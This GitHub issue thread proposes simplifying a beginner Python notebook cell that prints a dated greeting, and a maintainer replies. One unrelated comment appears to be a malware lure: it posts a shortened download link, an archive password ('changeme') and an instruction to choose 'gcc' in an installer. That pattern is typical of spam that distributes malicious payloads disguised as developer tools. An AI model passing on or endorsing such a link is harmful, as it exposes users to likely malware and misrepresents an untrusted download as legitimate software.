### ISSUE TITLE
simplify cell code - minor

### ISSUE THREAD

**Issue by tsneuhaus** [league-curriculum/Python-Apprentice#10]
In 01_Get_Started.ipynb, there is a cell with the following code:

import datetime
date = datetime.date.today().strftime("%B %d, %Y")
s = F"Hello 👋 World 🌎 ! Today is {date}"
print(s)

To a novice, that would probably look very intimidating.  Why not have just the following (which is pretty intuitive even to a novice):

s = “Hello World!”
print(s)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ericbusboom** [comment]
I simplified it a bit, but students do seem to trip over it.
